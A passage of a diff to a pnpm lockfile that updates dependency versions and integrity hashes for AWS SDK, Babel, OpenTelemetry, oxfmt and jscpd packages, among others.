sha512-Hek90FBmd4joCFj+Vc98KLJh73Zqj3s2W56gjAcTkrNLMDI5nIFkG9YpfcJiVI1YlE2Ne1uOQNe+IgQ/Vz2XRA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/util-format-url@3.972.6': resolution: {integrity: sha512-0YNVNgFyziCejXJx0rzxPiD2rkxTWco4c9wiMF6n37Tb9aQvIF8+t7GyEyIFCwQHZ0VMQaAl+nCZHOYz5I5EKw==} engines: {node: '>=20.0.0'} @@ -771,6 +837,9 @@ packages: '@aws-sdk/util-user-agent-browser@3.972.6': resolution: {integrity: sha512-Fwr/llD6GOrFgQnKaI2glhohdGuBDfHfora6iG9qsBBBR8xv1SdCSwbtf5CWlUdCw5X7g76G/9Hf0Inh0EmoxA==} + '@aws-sdk/util-user-agent-browser@3.972.7': + resolution: {integrity: sha512-7SJVuvhKhMF/BkNS1n0QAJYgvEwYbK2QLKBrzDiwQGiTRU6Yf1f3nehTzm/l21xdAOtWSfp2uWSddPnP2ZtsVw==} + '@aws-sdk/util-user-agent-node@3.973.0': resolution: {integrity: sha512-A9J2G4Nf236e9GpaC1JnA8wRn6u6GjnOXiTwBLA6NUJhlBTIGfrTy+K1IazmF8y+4OFdW3O5TZlhyspJMqiqjA==} engines: {node: '>=20.0.0'} @@ -780,6 +849,19 @@ packages: aws-crt: optional: true + '@aws-sdk/util-user-agent-node@3.973.4': + resolution: {integrity: sha512-uqKeLqZ9D3nQjH7HGIERNXK9qnSpUK08l4MlJ5/NZqSSdeJsVANYp437EM9sEzwU28c2xfj2V6qlkqzsgtKs6Q==} + engines: {node: '>=20.0.0'} + peerDependencies: + aws-crt: '>=1.0.0' + peerDependenciesMeta: + aws-crt: + optional: true + + '@aws-sdk/xml-builder@3.972.10': + resolution: {integrity: sha512-OnejAIVD+CxzyAUrVic7lG+3QRltyja9LoNqCE/1YVs8ichoTbJlVSaZ9iSMcnHLyzrSNtvaOGjSDRP+d/ouFA==} + engines: {node: '>=20.0.0'} + '@aws-sdk/xml-builder@3.972.8': resolution: {integrity: sha512-Ql8elcUdYCha83Ol7NznBsgN5GVZnv3vUd86fEc6waU6oUdY0T1O9NODkEEOS/Uaogr87avDrUC6DSeM4oXjZg==} engines: {node: '>=20.0.0'} @@ -808,8 +890,8 @@ packages: resolution: {integrity: sha512-CxUYSZgFiviUC3d8Hc+tT7uxre6QkPEWYEHWXmyEBzaO6tfFY4hs5KbXWU6s4q9Zv1NP/04qiR3mcujYLRuYuw==} engines: {node: '>=20'} - '@babel/generator@8.0.0-rc.1': - resolution: {integrity: sha512-3ypWOOiC4AYHKr8vYRVtWtWmyvcoItHtVqF8paFax+ydpmUdPsJpLBkBBs5ItmhdrwC3a0ZSqqFAdzls4ODP3w==} + '@babel/generator@8.0.0-rc.2': + resolution: {integrity: sha512-oCQ1IKPwkzCeJzAPb7Fv8rQ9k5+1sG8mf2uoHiMInPYvkRfrDJxbTIbH51U+jstlkghus0vAi3EBvkfvEsYNLQ==} engines: {node: ^20.19.0 || >=22.12.0} '@babel/helper-string-parser@7.27.1': @@ -824,8 +906,8 @@ packages: resolution: {integrity: sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q==} engines: {node: '>=6.9.0'} - '@babel/helper-validator-identifier@8.0.0-rc.1': - resolution: {integrity: sha512-I4YnARytXC2RzkLNVnf5qFNFMzp679qZpmtw/V3Jt2uGnWiIxyJtaukjG7R8pSx8nG2NamICpGfljQsogj+FbQ==} + '@babel/helper-validator-identifier@8.0.0-rc.2': + resolution: {integrity: sha512-xExUBkuXWJjVuIbO7z6q7/BA9bgfJDEhVL0ggrggLMbg0IzCUWGT1hZGE8qUH7Il7/RD/a6cZ3AAFrrlp1LF/A==} engines: {node: ^20.19.0 || >=22.12.0} '@babel/parser@7.29.0': @@ -833,8 +915,8 @@ packages: engines: {node: '>=6.0.0'} hasBin: true - '@babel/parser@8.0.0-rc.1': - resolution: {integrity: sha512-6HyyU5l1yK/7h9Ki52i5h6mDAx4qJdiLQO4FdCyJNoB/gy3T3GGJdhQzzbZgvgZCugYBvwtQiWRt94QKedHnkA==} + '@babel/parser@8.0.0-rc.2': + resolution: {integrity: sha512-29AhEtcq4x8Dp3T72qvUMZHx0OMXCj4Jy/TEReQa+KWLln524Cj1fWb3QFi0l/xSpptQBR6y9RNEXuxpFvwiUQ==} engines: {node: ^20.19.0 || >=22.12.0} hasBin: true @@ -846,8 +928,8 @@ packages: resolution: {integrity: sha512-LwdZHpScM4Qz8Xw2iKSzS+cfglZzJGvofQICy7W7v4caru4EaAmyUuO6BGrbyQ2mYV11W0U8j5mBhd14dd3B0A==} engines: {node: '>=6.9.0'} - '@babel/types@8.0.0-rc.1': - resolution: {integrity: sha512-ubmJ6TShyaD69VE9DQrlXcdkvJbmwWPB8qYj0H2kaJi29O7vJT9ajSdBd2W8CG34pwL9pYA74fi7RHC1qbLoVQ==} + '@babel/types@8.0.0-rc.2': + resolution: {integrity: sha512-91gAaWRznDwSX4E2tZ1YjBuIfnQVOFDCQ2r0Toby0gu4XEbyF623kXLMA8d4ZbCu+fINcrudkmEcwSUHgDDkNw==} engines: {node: ^20.19.0 || >=22.12.0} '@bcoe/v8-coverage@1.0.2': @@ -873,12 +955,22 @@ packages: '@clack/core@1.0.1': resolution: {integrity: sha512-WKeyK3NOBwDOzagPR5H08rFk9D/WuN705yEbuZvKqlkmoLM2woKtXb10OO2k1NoSU4SFG947i2/SCYh+2u5e4g==} + '@clack/core@1.1.0': + resolution: {integrity: sha512-SVcm4Dqm2ukn64/8Gub2wnlA5nS2iWJyCkdNHcvNHPIeBTGojpdJ+9cZKwLfmqy7irD4N5qLteSilJlE0WLAtA==} + '@clack/prompts@1.0.1': resolution: {integrity: sha512-/42G73JkuYdyWZ6m8d/CJtBrGl1Hegyc7Fy78m5Ob+jF85TOUmLR5XLce/U3LxYAw0kJ8CT5aI99RIvPHcGp/Q==} + '@clack/prompts@1.1.0': + resolution: {integrity: sha512-pkqbPGtohJAvm4Dphs2M8xE29ggupihHdy1x84HNojZuMtFsHiUlRvqD24tM2+XmI+61LlfNceM3Wr7U5QES5g==} + '@cloudflare/workers-types@4.20260120.0': resolution: {integrity: sha512-B8pueG+a5S+mdK3z8oKu1ShcxloZ7qWb68IEyLLaepvdryIbNC7JVPcY0bWsjS56UQVKc5fnyRge3yZIwc9bxw==} + '@colors/colors@1.5.0': + resolution: {integrity: sha512-ooWCrlZP11i8GImSjTHYHLkvFDP48nS4+204nGb1RiX/WXYHmJA2III9/e2DWVabCESdW7hBAEzHRqUn9OUVvQ==} + engines: {node: '>=0.1.90'} + '@cypress/request-promise@5.0.0': resolution: {integrity: sha512-eKdYVpa9cBEw2kTBlHeu1PP16Blwtum6QHg/u9s/MoHkZfuo1pRGka1VlUHXF5kdew82BvOJVVGk0x8X0nbp+w==} engines: {node: '>=0.10.0'} @@ -1316,6 +1408,21 @@ packages: '@js-sdsl/ordered-map@4.4.2': resolution: {integrity: sha512-iUKgm52T8HOE/makSxjqoWhe95ZJA1/G1sYsGev2JDKUSS14KAgg1LHb+Ba+IPow0xflbnSkOsZcO08C7w1gYw==} + '@jscpd/badge-reporter@4.0.4': + resolution: {integrity: sha512-I9b4MmLXPM2vo0SxSUWnNGKcA4PjQlD3GzXvFK60z43cN/EIdLbOq3FVwCL+dg2obUqGXKIzAm7EsDFTg0D+mQ==} + + '@jscpd/core@4.0.4': + resolution: {integrity: sha512-QGMT3iXEX1fI6lgjPH+x8eyJwhwr2KkpSF5uBpjC0Z5Xloj0yFTFLtwJT+RhxP/Ob4WYrtx2jvpKB269oIwgMQ==} + + '@jscpd/finder@4.0.4': + resolution: {integrity: sha512-qVUWY7Nzuvfd5OIk+n7/5CM98LmFroLqblRXAI2gDABwZrc7qS+WH2SNr0qoUq0f4OqwM+piiwKvwL/VDNn/Cg==} + + '@jscpd/html-reporter@4.0.4': + resolution: {integrity: sha512-YiepyeYkeH74Kx59PJRdUdonznct0wHPFkf6FLQN+mCBoy6leAWCcOfHtcexnp+UsBFDlItG5nRdKrDSxSH+Kg==} + + '@jscpd/tokenizer@4.0.4': + resolution: {integrity: sha512-xxYYY/qaLah/FlwogEbGIxx9CjDO+G9E6qawcy26WwrflzJb6wsnhjwdneN6Wb0RNCDsqvzY+bzG453jsin4UQ==} + '@keyv/bigmap@1.3.1': resolution: {integrity: sha512-WbzE9sdmQtKy8vrNPa9BRnwZh5UF4s1KTmSK0KUVLo3eff5BlQNNWDnFOouNpKfPKDnms9xynJjsMYjMaT/aFQ==} engines: {node: '>= 18'} @@ -1703,6 +1810,18 @@ packages: cpu: [x64] os: [win32] + '@nodelib/fs.scandir@2.1.5': + resolution: {integrity: sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==} + engines: {node: '>= 8'} + + '@nodelib/fs.stat@2.0.5': + resolution: {integrity: sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==} + engines: {node: '>= 8'} + + '@nodelib/fs.walk@1.2.8': + resolution: {integrity: sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==} + engines: {node: '>= 8'} + '@nolyfill/domexception@1.0.28': resolution: {integrity: sha512-tlc/FcYIv5i8RYsl2iDil4A0gOihaas1R5jPcIC4Zw3GhjKsVilw90aHcVlhZPTBLGBzd379S+VcnsDjd9ChiA==} engines: {node: '>=12.4.0'} @@ -1814,166 +1933,166 @@ packages: resolution: {integrity: sha512-da6KbdNCV5sr1/txD896V+6W0iamFWrvVl8cHkBSPT+YlvmT3DwXa4jxZnQc+gnuTEqSWbBeoSZYTayXH9wXcw==} engines: {node: '>= 20'} - '@opentelemetry/api-logs@0.212.0': - resolution: {integrity: sha512-TEEVrLbNROUkYY51sBJGk7lO/OLjuepch8+hmpM6ffMJQ2z/KVCjdHuCFX6fJj8OkJP2zckPjrJzQtXU3IAsFg==} + '@opentelemetry/api-logs@0.213.0': + resolution: {integrity: sha512-zRM5/Qj6G84Ej3F1yt33xBVY/3tnMxtL1fiDIxYbDWYaZ/eudVw3/PBiZ8G7JwUxXxjW8gU4g6LnOyfGKYHYgw==} engines: {node: '>=8.0.0'} '@opentelemetry/api@1.9.0': resolution: {integrity: sha512-3giAOQvZiH5F9bMlMiv8+GSPMeqg0dbaeo58/0SlA9sxSqZhnUtxzX9/2FzyhS9sWQf5S0GJE0AKBrFqjpeYcg==} engines: {node: '>=8.0.0'} - '@opentelemetry/configuration@0.212.0': - resolution: {integrity: sha512-D8sAY6RbqMa1W8lCeiaSL2eMCW2MF87QI3y+I6DQE1j+5GrDMwiKPLdzpa/2/+Zl9v1//74LmooCTCJBvWR8Iw==} + '@opentelemetry/configuration@0.213.0': + resolution: {integrity: sha512-MfVgZiUuwL1d3bPPvXcEkVHGTGNUGoqGK97lfwBuRoKttcVGGqDyxTCCVa5MGbirtBQkUTysXMBUVWPaq7zbWw==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.9.0 - '@opentelemetry/context-async-hooks@2.5.1': - resolution: {integrity: sha512-MHbu8XxCHcBn6RwvCt2Vpn1WnLMNECfNKYB14LI5XypcgH4IE0/DiVifVR9tAkwPMyLXN8dOoPJfya3IryLQVw==} + '@opentelemetry/context-async-hooks@2.6.0': + resolution: {integrity: sha512-L8UyDwqpTcbkIK5cgwDRDYDoEhQoj8wp8BwsO19w3LB1Z41yEQm2VJyNfAi9DrLP/YTqXqWpKHyZfR9/tFYo1Q==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.0.0 <1.10.0' - '@opentelemetry/core@2.5.1': - resolution: {integrity: sha512-Dwlc+3HAZqpgTYq0MUyZABjFkcrKTePwuiFVLjahGD8cx3enqihmpAmdgNFO1R4m/sIe5afjJrA25Prqy4NXlA==} + '@opentelemetry/core@2.6.0': + resolution: {integrity: sha512-HLM1v2cbZ4TgYN6KEOj+Bbj8rAKriOdkF9Ed3tG25FoprSiQl7kYc+RRT6fUZGOvx0oMi5U67GoFdT+XUn8zEg==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.0.0 <1.10.0' - '@opentelemetry/exporter-logs-otlp-grpc@0.212.0': - resolution: {integrity: sha512-/0bk6fQG+eSFZ4L6NlckGTgUous/ib5+OVdg0x4OdwYeHzV3lTEo3it1HgnPY6UKpmX7ki+hJvxjsOql8rCeZA==} + '@opentelemetry/exporter-logs-otlp-grpc@0.213.0': + resolution: {integrity: sha512-QiRZzvayEOFnenSXi85Eorgy5WTqyNQ+E7gjl6P6r+W3IUIwAIH8A9/BgMWfP056LwmdrBL6+qvnwaIEmug6Yg==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-logs-otlp-http@0.212.0': - resolution: {integrity: sha512-JidJasLwG/7M9RTxV/64xotDKmFAUSBc9SNlxI32QYuUMK5rVKhHNWMPDzC7E0pCAL3cu+FyiKvsTwLi2KqPYw==} + '@opentelemetry/exporter-logs-otlp-http@0.213.0': + resolution: {integrity: sha512-vqDVSpLp09ZzcFIdb7QZrEFPxUlO3GzdhBKLstq3jhYB5ow3+ZtV5V0ngSdi/0BZs+J5WPiN1+UDV4X5zD/GzA==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-logs-otlp-proto@0.212.0': - resolution: {integrity: sha512-RpKB5UVfxc7c6Ta1UaCrxXDTQ0OD7BCGT66a97Q5zR1x3+9fw4dSaiqMXT/6FAWj2HyFbem6Rcu1UzPZikGTWQ==} + '@opentelemetry/exporter-logs-otlp-proto@0.213.0': + resolution: {integrity: sha512-gQk41nqfK3KhDk8jbSo3LR/fQBlV7f6Q5xRcfDmL1hZlbgXQPdVFV9/rIfYUrCoq1OM+2NnKnFfGjBt6QpLSsA==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-metrics-otlp-grpc@0.212.0': - resolution: {integrity: sha512-/6Gqf9wpBq22XsomR1i0iPGnbQtCq2Vwnrq5oiDPjYSqveBdK1jtQbhGfmpK2mLLxk4cPDtD1ZEYdIou5K8EaA==} + '@opentelemetry/exporter-metrics-otlp-grpc@0.213.0': + resolution: {integrity: sha512-Z8gYKUAU48qwm+a1tjnGv9xbE7a5lukVIwgF6Z5i3VPXPVMe4Sjra0nN3zU7m277h+V+ZpsPGZJ2Xf0OTkL7/w==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-metrics-otlp-http@0.212.0': - resolution: {integrity: sha512-8hgBw3aTTRpSTkU4b9MLf/2YVLnfWp+hfnLq/1Fa2cky+vx6HqTodo+Zv1GTIrAKMOOwgysOjufy0gTxngqeBg==} + '@opentelemetry/exporter-metrics-otlp-http@0.213.0': + resolution: {integrity: sha512-yw3fTIw4KQIRXC/ZyYQq5gtA3Ogfdfz/g5HVgleobQAcjUUE8Nj3spGMx8iQPp+S+u6/js7BixufRkXhzLmpJA==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-metrics-otlp-proto@0.212.0': - resolution: {integrity: sha512-C7I4WN+ghn3g7SnxXm2RK3/sRD0k/BYcXaK6lGU3yPjiM7a1M25MLuM6zY3PeVPPzzTZPfuS7+wgn/tHk768Xw==} + '@opentelemetry/exporter-metrics-otlp-proto@0.213.0': + resolution: {integrity: sha512-geHF+zZaDb0/WRkJTxR8o8dG4fCWT/Wq7HBdNZCxwH5mxhwRi/5f37IDYH7nvU+dwU6IeY4Pg8TPI435JCiNkg==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-prometheus@0.212.0': - resolution: {integrity: sha512-hJFLhCJba5MW5QHexZMHZdMhBfNqNItxOsN0AZojwD1W2kU9xM+BEICowFGJFo/vNV+I2BJvTtmuKafeDSAo7Q==} + '@opentelemetry/exporter-prometheus@0.213.0': + resolution: {integrity: sha512-FyV3/JfKGAgx+zJUwCHdjQHbs+YeGd2fOWvBHYrW6dmfv/w89lb8WhJTSZEoWgP525jwv/gFeBttlGu1flebdA==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-trace-otlp-grpc@0.212.0': - resolution: {integrity: sha512-9xTuYWp8ClBhljDGAoa0NSsJcsxJsC9zCFKMSZJp1Osb9pjXCMRdA6fwXtlubyqe7w8FH16EWtQNKx/FWi+Ghw==} + '@opentelemetry/exporter-trace-otlp-grpc@0.213.0': + resolution: {integrity: sha512-L8y6piP4jBIIx1Nv7/9hkx25ql6/Cro/kQrs+f9e8bPF0Ar5Dm991v7PnbtubKz6Q4fT872H56QXUWVnz/Cs4Q==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-trace-otlp-http@0.212.0': - resolution: {integrity: sha512-v/0wMozNoiEPRolzC4YoPo4rAT0q8r7aqdnRw3Nu7IDN0CGFzNQazkfAlBJ6N5y0FYJkban7Aw5WnN73//6YlA==} + '@opentelemetry/exporter-trace-otlp-http@0.213.0': + resolution: {integrity: sha512-tnRmJD39aWrE/Sp7F6AbRNAjKHToDkAqBi6i0lESpGWz3G+f4bhVAV6mgSXH2o18lrDVJXo6jf9bAywQw43wRA==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-trace-otlp-proto@0.212.0': - resolution: {integrity: sha512-d1ivqPT0V+i0IVOOdzGaLqonjtlk5jYrW7ItutWzXL/Mk+PiYb59dymy/i2reot9dDnBFWfrsvxyqdutGF5Vig==} + '@opentelemetry/exporter-trace-otlp-proto@0.213.0': + resolution: {integrity: sha512-six3vPq3sL+ge1iZOfKEg+RHuFQhGb8ZTdlvD234w/0gi8ty/qKD46qoGpKvM3amy5yYunWBKiFBW47WaVS26w==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/exporter-zipkin@2.5.1': - resolution: {integrity: sha512-Me6JVO7WqXGXsgr4+7o+B7qwKJQbt0c8WamFnxpkR43avgG9k/niTntwCaXiXUTjonWy0+61ZuX6CGzj9nn8CQ==} + '@opentelemetry/exporter-zipkin@2.6.0': + resolution: {integrity: sha512-AFP77OQMLfw/Jzh6WT2PtrywstNjdoyT9t9lYrYdk1s4igsvnMZ8DkZKCwxsItC01D+4Lydgrb+Wy0bAvpp8xg==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.0.0 - '@opentelemetry/instrumentation@0.212.0': - resolution: {integrity: sha512-IyXmpNnifNouMOe0I/gX7ENfv2ZCNdYTF0FpCsoBcpbIHzk81Ww9rQTYTnvghszCg7qGrIhNvWC8dhEifgX9Jg==} + '@opentelemetry/instrumentation@0.213.0': + resolution: {integrity: sha512-3i9NdkET/KvQomeh7UaR/F4r9P25Rx6ooALlWXPIjypcEOUxksCmVu0zA70NBJWlrMW1rPr/LRidFAflLI+s/w==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/otlp-exporter-base@0.212.0': - resolution: {integrity: sha512-HoMv5pQlzbuxiMS0hN7oiUtg8RsJR5T7EhZccumIWxYfNo/f4wFc7LPDfFK6oHdG2JF/+qTocfqIHoom+7kLpw==} + '@opentelemetry/otlp-exporter-base@0.213.0': + resolution: {integrity: sha512-MegxAP1/n09Ob2dQvY5NBDVjAFkZRuKtWKxYev1R2M8hrsgXzQGkaMgoEKeUOyQ0FUyYcO29UOnYdQWmWa0PXg==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/otlp-grpc-exporter-base@0.212.0': - resolution: {integrity: sha512-YidOSlzpsun9uw0iyIWrQp6HxpMtBlECE3tiHGAsnpEqJWbAUWcMnIffvIuvTtTQ1OyRtwwaE79dWSQ8+eiB7g==} + '@opentelemetry/otlp-grpc-exporter-base@0.213.0': + resolution: {integrity: sha512-XgRGuLE9usFNlnw2lgMIM4HTwpcIyjdU/xPoJ8v3LbBLBfjaDkIugjc9HoWa7ZSJ/9Bhzgvm/aD0bGdYUFgnTw==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/otlp-transformer@0.212.0': - resolution: {integrity: sha512-bj7zYFOg6Db7NUwsRZQ/WoVXpAf41WY2gsd3kShSfdpZQDRKHWJiRZIg7A8HvWsf97wb05rMFzPbmSHyjEl9tw==} + '@opentelemetry/otlp-transformer@0.213.0': + resolution: {integrity: sha512-RSuAlxFFPjeK4d5Y6ps8L2WhaQI6CXWllIjvo5nkAlBpmq2XdYWEBGiAbOF4nDs8CX4QblJDv5BbMUft3sEfDw==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': ^1.3.0 - '@opentelemetry/propagator-b3@2.5.1': - resolution: {integrity: sha512-AU6sZgunZrZv/LTeHP+9IQsSSH5p3PtOfDPe8VTdwYH69nZCfvvvXehhzu+9fMW2mgJMh5RVpiH8M9xuYOu5Dg==} + '@opentelemetry/propagator-b3@2.6.0': + resolution: {integrity: sha512-SguK4jMmRvQ0c0dxAMl6K+Eu1+01X0OP7RLiIuHFjOS8hlB23ZYNnhnbAdSQEh5xVXQmH0OAS0TnmVI+6vB2Kg==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.0.0 <1.10.0' - '@opentelemetry/propagator-jaeger@2.5.1': - resolution: {integrity: sha512-8+SB94/aSIOVGDUPRFSBRHVUm2A8ye1vC6/qcf/D+TF4qat7PC6rbJhRxiUGDXZtMtKEPM/glgv5cBGSJQymSg==} + '@opentelemetry/propagator-jaeger@2.6.0': + resolution: {integrity: sha512-KGWJuvp9X8X36bhHgIhWEnHAzXDInFr+Fvo9IQhhuu6pXLT8mF7HzFyx/X+auZUITvPaZhM39Phj3vK12MbhwA==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.0.0 <1.10.0' - '@opentelemetry/resources@2.5.1': - resolution: {integrity: sha512-BViBCdE/GuXRlp9k7nS1w6wJvY5fnFX5XvuEtWsTAOQFIO89Eru7lGW3WbfbxtCuZ/GbrJfAziXG0w0dpxL7eQ==} + '@opentelemetry/resources@2.6.0': + resolution: {integrity: sha512-D4y/+OGe3JSuYUCBxtH5T9DSAWNcvCb/nQWIga8HNtXTVPQn59j0nTBAgaAXxUVBDl40mG3Tc76b46wPlZaiJQ==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.3.0 <1.10.0' - '@opentelemetry/sdk-logs@0.212.0': - resolution: {integrity: sha512-qglb5cqTf0mOC1sDdZ7nfrPjgmAqs2OxkzOPIf2+Rqx8yKBK0pS7wRtB1xH30rqahBIut9QJDbDePyvtyqvH/Q==} + '@opentelemetry/sdk-logs@0.213.0': + resolution: {integrity: sha512-00xlU3GZXo3kXKve4DLdrAL0NAFUaZ9appU/mn00S/5kSUdAvyYsORaDUfR04Mp2CLagAOhrzfUvYozY/EZX2g==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.4.0 <1.10.0' - '@opentelemetry/sdk-metrics@2.5.1': - resolution: {integrity: sha512-RKMn3QKi8nE71ULUo0g/MBvq1N4icEBo7cQSKnL3URZT16/YH3nSVgWegOjwx7FRBTrjOIkMJkCUn/ZFIEfn4A==} + '@opentelemetry/sdk-metrics@2.6.0': + resolution: {integrity: sha512-CicxWZxX6z35HR83jl+PLgtFgUrKRQ9LCXyxgenMnz5A1lgYWfAog7VtdOvGkJYyQgMNPhXQwkYrDLujk7z1Iw==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.9.0 <1.10.0' - '@opentelemetry/sdk-node@0.212.0': - resolution: {integrity: sha512-tJzVDk4Lo44MdgJLlP+gdYdMnjxSNsjC/IiTxj5CFSnsjzpHXwifgl3BpUX67Ty3KcdubNVfedeBc/TlqHXwwg==} + '@opentelemetry/sdk-node@0.213.0': + resolution: {integrity: sha512-8s7SQtY8DIAjraXFrUf0+I90SBAUQbsMWMtUGKmusswRHWXtKJx42aJQMoxEtC82Csqj+IlBH6FoP8XmmUDSrQ==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.3.0 <1.10.0' - '@opentelemetry/sdk-trace-base@2.5.1': - resolution: {integrity: sha512-iZH3Gw8cxQn0gjpOjJMmKLd9GIaNh/E3v3ST67vyzLSxHBs14HsG4dy7jMYyC5WXGdBVEcM7U/XTF5hCQxjDMw==} + '@opentelemetry/sdk-trace-base@2.6.0': + resolution: {integrity: sha512-g/OZVkqlxllgFM7qMKqbPV9c1DUPhQ7d4n3pgZFcrnrNft9eJXZM2TNHTPYREJBrtNdRytYyvwjgL5geDKl3EQ==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.3.0 <1.10.0' - '@opentelemetry/sdk-trace-node@2.5.1': - resolution: {integrity: sha512-9lopQ6ZoElETOEN0csgmtEV5/9C7BMfA7VtF4Jape3i954b6sTY2k3Xw3CxUTKreDck/vpAuJM+EDo4zheUw+A==} + '@opentelemetry/sdk-trace-node@2.6.0': + resolution: {integrity: sha512-YhswtasmsbIGEFvLGvR9p/y3PVRTfFf+mgY8van4Ygpnv4sA3vooAjvh+qAn9PNWxs4/IwGGqiQS0PPsaRJ0vQ==} engines: {node: ^18.19.0 || >=20.6.0} peerDependencies: '@opentelemetry/api': '>=1.0.0 <1.10.0' @@ -1982,263 +2101,263 @@ packages: resolution: {integrity: sha512-cifvXDhcqMwwTlTK04GBNeIe7yyo28Mfby85QXFe1Yk8nmi36Ab/5UQwptOx84SsoGNRg+EVSjwzfSZMy6pmlw==} engines: {node: '>=14'} - '@oxc-project/types@0.114.0': - resolution: {integrity: sha512-//nBfbzHQHvJs8oFIjv6coZ6uxQ4alLfiPe6D5vit6c4pmxATHHlVwgB1k+Hv4yoAMyncdxgRBF5K4BYWUCzvA==} + '@oxc-project/types@0.115.0': + resolution: {integrity: sha512-4n91DKnebUS4yjUHl2g3/b2T+IUdCfmoZGhmwsovZCDaJSs+QkVAM+0AqqTxHSsHfeiMuueT75cZaZcT/m0pSw==} - '@oxfmt/binding-android-arm-eabi@0.35.0': - resolution: {integrity: sha512-BaRKlM3DyG81y/xWTsE6gZiv89F/3pHe2BqX2H4JbiB8HNVlWWtplzgATAE5IDSdwChdeuWLDTQzJ92Lglw3ZA==} + '@oxfmt/binding-android-arm-eabi@0.36.0': + resolution: {integrity: sha512-Z4yVHJWx/swHHjtr0dXrBZb6LxS+qNz1qdza222mWwPTUK4L790+5i3LTgjx3KYGBzcYpjaiZBw4vOx94dH7MQ==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm] os: [android] - '@oxfmt/binding-android-arm64@0.35.0': - resolution: {integrity: sha512-/O+EbuAJYs6nde/anv+aID6uHsGQApyE9JtYBo/79KyU8e6RBN3DMbT0ix97y1SOnCglurmL2iZ+hlohjP2PnQ==} + '@oxfmt/binding-android-arm64@0.36.0': + resolution: {integrity: sha512-3ElCJRFNPQl7jexf2CAa9XmAm8eC5JPrIDSjc9jSchkVSFTEqyL0NtZinBB2h1a4i4JgP1oGl/5G5n8YR4FN8Q==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [android] - '@oxfmt/binding-darwin-arm64@0.35.0': - resolution: {integrity: sha512-pGqRtqlNdn9d4VrmGUWVyQjkw79ryhI6je9y2jfqNUIZCfqceob+R97YYAoG7C5TFyt8ILdLVoN+L2vw/hSFyA==} + '@oxfmt/binding-darwin-arm64@0.36.0': + resolution: {integrity: sha512-nak4znWCqIExKhYSY/mz/lWsqWIpdsS7o0+SRzXR1Q0m7GrMcG1UrF1pS7TLGZhhkf7nTfEF7q6oZzJiodRDuw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [arm64] os: [darwin] - '@oxfmt/binding-darwin-x64@0.35.0': - resolution: {integrity: sha512-8GmsDcSozTPjrCJeGpp+sCmS9+9V5yRrdEZ1p/sTWxPG5nYeAfSLuS0nuEYjXSO+CtdSbStIW6dxa+4NM58yRw==} + '@oxfmt/binding-darwin-x64@0.36.0': + resolution: {integrity: sha512-V4GP96thDnpKx6ADnMDnhIXNdtV+Ql9D4HUU+a37VTeVbs5qQSF/s6hhUP1b3xUqU7iRcwh72jUU2Y12rtGHAw==} engines: {node: ^20.19.0 || >=22.12.0} cpu: [x64] os: [darwin] - '@oxfmt/binding-freebsd-x64@0.35.0': - resolution: {integrity: sha512-QyfKfTe0ytHpFKHAcHCGQEzN45QSqq1AHJOYYxQMgLM3KY4xu8OsXHpCnINjDsV4XGnQzczJDU9e04Zmd8XqIQ==} + '@oxfmt/binding-freebsd-x64@0.36.0': + resolution: {integrity: 